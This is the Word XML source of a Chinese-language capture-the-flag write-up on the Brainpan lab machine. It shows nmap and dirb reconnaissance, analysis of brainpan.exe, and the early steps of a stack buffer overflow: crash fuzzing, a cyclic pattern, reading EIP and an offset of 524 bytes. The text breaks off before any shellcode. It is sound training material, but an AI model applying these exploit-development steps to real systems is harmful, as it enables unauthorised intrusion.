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E4A6B" w14:textId="7CBB5974" w:rsidR="009341EF" w:rsidRDefault="00294BCD">
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rainpan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9D9DD3" w14:textId="77777777" w:rsidR="00294BCD" w:rsidRDefault="00294BCD"/>
    <w:p w14:paraId="40DAC64D" w14:textId="6248ADE0" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D84763" w14:textId="1B2A2999" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r w:rsidRPr="00294BCD">
        <w:t>arp-scan -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2060CD" w14:textId="1A00FEFD" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r w:rsidRPr="00294BCD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3342DF44" wp14:editId="5CBE823A">
            <wp:extent cx="5274310" cy="1319530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="65115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531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646C" w14:textId="7FEAD355" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C45B1E9" w14:textId="443F5CD9" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r w:rsidRPr="00294BCD">
        <w:t>nmap --min-rate 10000 -p- 192.168.21.156</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346C9ABF" w14:textId="39EFF1C8" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r w:rsidRPr="00294BCD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="451B6005" wp14:editId="54DF41F7">
            <wp:extent cx="5274310" cy="1848485"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1800338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386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CCBA" w14:textId="2FB512E6" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E88F440" w14:textId="79E672DF" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r w:rsidRPr="00294BCD">
        <w:t>nmap -sV -sT -O -p9999,10000 192.168.21.156</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435B02D5" w14:textId="55861302" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r w:rsidRPr="00294BCD">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="139429E4" wp14:editId="09C6BA90">
            <wp:extent cx="5274310" cy="4327525"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1321404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049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E5CB" w14:textId="1970500D" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个地方感到了有点不对劲，python起来的一个web端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773B7BD1" w14:textId="6AA342DC" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C89324A" w14:textId="5E7F6595" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r w:rsidRPr="00294BCD">
        <w:t>nmap --script=vuln -p9999,10000 192.168.21.156</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6F7F91" w14:textId="70F50FA8" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r w:rsidRPr="00294BCD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04669B98" wp14:editId="306D6B02">
            <wp:extent cx="5274310" cy="1974215"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="711516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168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2770" w14:textId="556BFC94" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>意料之中，先去看一下web的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB350D6" w14:textId="1BD46CF5" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r w:rsidRPr="00294BCD">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F64BB4F" wp14:editId="280596B3">
            <wp:extent cx="5274310" cy="5127625"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1606991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919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E532" w14:textId="7F9D4E44" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r w:rsidRPr="00294BCD">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50D0875B" wp14:editId="6AE58340">
            <wp:extent cx="3977985" cy="4671465"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="653396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969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693D" w14:textId="133DFF97" w:rsidR="00294BCD" w:rsidRDefault="00294BCD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个就是一张图片</w:t>
      </w:r>
      <w:r w:rsidR="00DE2185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是还是扫个目录看一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587C7C5C" w14:textId="3AC09889" w:rsidR="00DE2185" w:rsidRDefault="00DE2185">
      <w:r w:rsidRPr="00DE2185">
        <w:t>dirb http://192.168.21.156:10000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6D6CF1" w14:textId="5E2143B2" w:rsidR="00DE2185" w:rsidRDefault="00DE2185">
      <w:r w:rsidRPr="00DE2185">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D2EF7D7" wp14:editId="52D3EA51">
            <wp:extent cx="5274310" cy="3729990"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="1772117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173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7197" w14:textId="37048D9E" w:rsidR="00DE2185" w:rsidRDefault="00DE2185">
      <w:r w:rsidRPr="00DE2185">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44B9BBAB" wp14:editId="24615DB9">
            <wp:extent cx="4679085" cy="2522439"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="204325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503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886C" w14:textId="7763FD1C" w:rsidR="00DE2185" w:rsidRDefault="00DE2185">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里有一个exe文件，想都不用想要下下来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E3D523" w14:textId="66AF9956" w:rsidR="00294BCD" w:rsidRDefault="00DE2185">
      <w:r w:rsidRPr="00DE2185">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="799A5813" wp14:editId="3247E625">
            <wp:extent cx="5274310" cy="1071880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="340252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526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B743" w14:textId="2269697A" w:rsidR="00DE2185" w:rsidRDefault="00DE2185">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件没有什么问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4077DB6F" w14:textId="5768C4C2" w:rsidR="00DE2185" w:rsidRDefault="002F1CD2">
      <w:r w:rsidRPr="002F1CD2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69512DE0" wp14:editId="6A59DDB0">
            <wp:extent cx="4572396" cy="2789162"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1494193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93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D9E3" w14:textId="01386D7C" w:rsidR="002F1CD2" w:rsidRDefault="002F1CD2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是9</w:t>
      </w:r>
      <w:r>
        <w:t>999</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口发现了点东西，web不能直接交互用nc连着试试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CA07D4" w14:textId="16FDB1AC" w:rsidR="002F1CD2" w:rsidRDefault="002F1CD2">
      <w:r w:rsidRPr="002F1CD2">
        <w:t>nc 192.168.21.156 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179C8A6B" w14:textId="33DF789F" w:rsidR="002F1CD2" w:rsidRDefault="002F1CD2">
      <w:r w:rsidRPr="002F1CD2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F233498" wp14:editId="4CC21EBD">
            <wp:extent cx="5274310" cy="2002155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="546890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904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FB1E" w14:textId="574968F1" w:rsidR="002F1CD2" w:rsidRDefault="002F1CD2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来只剩下一条线索（exe文件）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ABE674" w14:textId="1D49A622" w:rsidR="002F1CD2" w:rsidRDefault="002F1CD2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前面已经查看了文件有没有特殊的地方，接下来就剩下文件的内容了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCD6430" w14:textId="34D9B6D8" w:rsidR="002F1CD2" w:rsidRDefault="002F1CD2">
      <w:r w:rsidRPr="002F1CD2">
        <w:t>strings brainpan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353AE556" w14:textId="500AC691" w:rsidR="002F1CD2" w:rsidRDefault="002F1CD2">
      <w:r w:rsidRPr="002F1CD2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48707B9F" wp14:editId="19649285">
            <wp:extent cx="5274310" cy="4105910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="183485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88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F8EC" w14:textId="4C95BDC3" w:rsidR="002F1CD2" w:rsidRDefault="002F1CD2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面还有很多，但是发现这个界面挺熟悉的，那么9</w:t>
      </w:r>
      <w:r>
        <w:t>999</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口上运行的也是这个exe了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6904F614" w14:textId="16099DB4" w:rsidR="002F1CD2" w:rsidRDefault="00B21E06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里可能这个有用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D964B0E" w14:textId="77777777" w:rsidR="00B21E06" w:rsidRDefault="00B21E06" w:rsidP="00B21E06">
      <w:r>
        <w:t>[get_reply] copied %d bytes to buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EABC6B" w14:textId="2737C86E" w:rsidR="00B21E06" w:rsidRDefault="00B21E06" w:rsidP="00B21E06">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>hitstorm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BA14F7" w14:textId="0D3F9FAC" w:rsidR="00B21E06" w:rsidRDefault="00B21E06" w:rsidP="00B21E06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>试一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AEC190" w14:textId="316AEC5A" w:rsidR="00B21E06" w:rsidRDefault="00B21E06" w:rsidP="00B21E06">
      <w:r w:rsidRPr="00B21E06">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DFA0725" wp14:editId="619F833D">
            <wp:extent cx="5274310" cy="2010410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="551634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342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BEE2" w14:textId="7CC48EEB" w:rsidR="00B21E06" w:rsidRDefault="00B21E06" w:rsidP="00B21E06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里只是成功了但是没有看到什么，去windows试一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270348B5" w14:textId="6E613641" w:rsidR="00B21E06" w:rsidRDefault="00B21E06" w:rsidP="00B21E06">
      <w:r w:rsidRPr="00B21E06">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="226B4D0F" wp14:editId="0977EC3A">
            <wp:extent cx="4016088" cy="1234547"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="432744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446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B181" w14:textId="78A90BD1" w:rsidR="00B21E06" w:rsidRDefault="00B21E06" w:rsidP="00B21E06">
      <w:r w:rsidRPr="00B21E06">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08374AD6" wp14:editId="3A4776D9">
            <wp:extent cx="5274310" cy="2110740"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="1652955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550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FA67" w14:textId="70E71606" w:rsidR="00B21E06" w:rsidRDefault="00B21E06" w:rsidP="00B21E06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>试过之后发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E176A85" w14:textId="304A6A12" w:rsidR="00B21E06" w:rsidRDefault="00B21E06" w:rsidP="00B21E06">
      <w:r w:rsidRPr="00B21E06">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31D3F8F3" wp14:editId="2C0255E6">
            <wp:extent cx="4023709" cy="2796782"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="53859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917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FA14" w14:textId="325529CA" w:rsidR="00B21E06" w:rsidRDefault="00B21E06" w:rsidP="00B21E06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里有复制字符串的函数这里很有可能出现溢出漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579EFCDE" w14:textId="0E94143B" w:rsidR="00B21E06" w:rsidRDefault="002A05C5" w:rsidP="00B21E06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里写脚本吧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AB6E1B" w14:textId="0A538293" w:rsidR="002A05C5" w:rsidRDefault="007061D2" w:rsidP="00B21E06">
      <w:r w:rsidRPr="007061D2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40C5073C" wp14:editId="3C34DECB">
            <wp:extent cx="5274310" cy="4098290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="373241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18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736F" w14:textId="50FAF9E0" w:rsidR="007061D2" w:rsidRDefault="007061D2" w:rsidP="007061D2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1097"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="007061D2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4750EAEE" wp14:editId="06517D2A">
            <wp:extent cx="3337849" cy="3612193"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="99176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615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61AC" w14:textId="3C14E34C" w:rsidR="007061D2" w:rsidRDefault="007061D2" w:rsidP="007061D2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1097"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多跑几遍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC12C3C" w14:textId="740AE88A" w:rsidR="002A05C5" w:rsidRDefault="007061D2" w:rsidP="00B21E06">
      <w:r w:rsidRPr="007061D2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6187E374" wp14:editId="7729541F">
            <wp:extent cx="5274310" cy="2454910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="1152744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445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12B4" w14:textId="0B921736" w:rsidR="007061D2" w:rsidRDefault="007061D2" w:rsidP="00B21E06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里发现6</w:t>
      </w:r>
      <w:r>
        <w:t>00-700</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间出现报错，那么软件是在6</w:t>
      </w:r>
      <w:r>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节的时候崩的，需要再一次确定具体的字节数，利用不一样的字节来判断什么时候出现溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02908198" w14:textId="7666F31D" w:rsidR="007061D2" w:rsidRDefault="007061D2" w:rsidP="00B21E06">
      <w:r w:rsidRPr="007061D2">
        <w:t>msf-pattern_create -l 600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491B0379" w14:textId="07DD9693" w:rsidR="007061D2" w:rsidRDefault="007061D2" w:rsidP="00B21E06">
      <w:r w:rsidRPr="007061D2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AE64B62" wp14:editId="00FB1189">
            <wp:extent cx="5274310" cy="791210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1533000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007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CC5F" w14:textId="643D1E38" w:rsidR="007061D2" w:rsidRDefault="007061D2" w:rsidP="007061D2">
      <w:r>
        <w:t>Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8F2DFE" w14:textId="2AE2271A" w:rsidR="007061D2" w:rsidRDefault="007061D2" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改刚刚写的脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CF27A1" w14:textId="0BE5B937" w:rsidR="007061D2" w:rsidRDefault="007061D2" w:rsidP="007061D2">
      <w:r w:rsidRPr="007061D2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06FF1946" wp14:editId="71A7B645">
            <wp:extent cx="5274310" cy="2786380"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10834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BEA3" w14:textId="40CE4591" w:rsidR="007061D2" w:rsidRDefault="007061D2" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要使用新的软件immunitydebugger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD2DE8B" w14:textId="61DF0076" w:rsidR="007061D2" w:rsidRDefault="00436ABA" w:rsidP="007061D2">
      <w:r w:rsidRPr="00436ABA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43219E49" wp14:editId="4ACAE79C">
            <wp:extent cx="5274310" cy="3296285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2103511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119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5807" w14:textId="7B6C9FE6" w:rsidR="00436ABA" w:rsidRDefault="00436ABA" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意寄存器，需要吧缓冲区全部占满，然后吧我们的shell写进去</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D9EE9C" w14:textId="3EDB0F33" w:rsidR="00436ABA" w:rsidRDefault="00436ABA" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先运行脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4094BD5B" w14:textId="22B3E244" w:rsidR="00436ABA" w:rsidRDefault="00436ABA" w:rsidP="007061D2">
      <w:r w:rsidRPr="00436ABA">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69FC103C" wp14:editId="747E1441">
            <wp:extent cx="5274310" cy="4007485"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="316782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821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89DA" w14:textId="2AC392AF" w:rsidR="00436ABA" w:rsidRDefault="00436ABA" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意要这个软件的exe文件在运行状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BADCBD" w14:textId="041403B0" w:rsidR="00436ABA" w:rsidRDefault="00436ABA" w:rsidP="007061D2">
      <w:r w:rsidRPr="00436ABA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EDE3A27" wp14:editId="08F9209A">
            <wp:extent cx="5274310" cy="1671955"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="74179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99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3D3D" w14:textId="6ABE0867" w:rsidR="00436ABA" w:rsidRDefault="00436ABA" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里只要看eip（这个是下一个指令的位置）</w:t>
      </w:r>
      <w:r w:rsidR="00711149">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，记住eip的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEFF8E0" w14:textId="279F8F9D" w:rsidR="00711149" w:rsidRDefault="00711149" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>5724134</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725DE525" w14:textId="730D0FDB" w:rsidR="00711149" w:rsidRDefault="00711149" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算偏移量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1441D3D5" w14:textId="5A16115D" w:rsidR="00711149" w:rsidRDefault="00711149" w:rsidP="007061D2">
      <w:r w:rsidRPr="00711149">
        <w:t>msf-pattern_offset -l 600 -q 35724134</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E08F6B" w14:textId="6514D196" w:rsidR="00711149" w:rsidRDefault="00711149" w:rsidP="007061D2">
      <w:r w:rsidRPr="00711149">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AB95230" wp14:editId="6292EE73">
            <wp:extent cx="4671465" cy="655377"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1230786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863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67E2" w14:textId="54326E01" w:rsidR="00711149" w:rsidRDefault="00711149" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节填充eip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463453B5" w14:textId="5520946C" w:rsidR="00711149" w:rsidRDefault="00711149" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么修改一下脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139665E8" w14:textId="3651C8BF" w:rsidR="00711149" w:rsidRDefault="0030039B" w:rsidP="007061D2">
      <w:r w:rsidRPr="0030039B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A8F2605" wp14:editId="7E8F7071">
            <wp:extent cx="5274310" cy="4703445"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="526969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694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DBD6" w14:textId="0AEA2448" w:rsidR="00711149" w:rsidRDefault="00711149" w:rsidP="007061D2">
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和c（看看寄存器</w:t>
      </w:r>
      <w:r w:rsidR="0030039B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来确定b，剩下来的就是c的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），再来运行程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE0F55B" w14:textId="243CC154" w:rsidR="00711149" w:rsidRDefault="00711149" w:rsidP="007061D2">
      <w:r w:rsidRPr="00711149">
        <w:t>python2.7 yichu.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A54D3C" w14:textId="04B7E89D" w:rsidR="00711149" w:rsidRDefault="00711149" w:rsidP="007061D2">
      <w:r w:rsidRPr="00711149">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E637494" wp14:editId="687C0550">
            <wp:extent cx="3383573" cy="1021168"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="435627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27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DA71" w14:textId="40EA7FB6" w:rsidR="00711149" w:rsidRDefault="0030039B" w:rsidP="007061D2">
      <w:r w:rsidRPr="0030039B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F32329E" wp14:editId="5D762546">
            <wp:extent cx="5274310" cy="775335"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1323058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585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3B5F" w14:textId="0E67FAE0" w:rsidR="0030039B" w:rsidRDefault="0030039B" w:rsidP="007061D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆栈的情况</w:t>
      </w:r>
    </w:p>
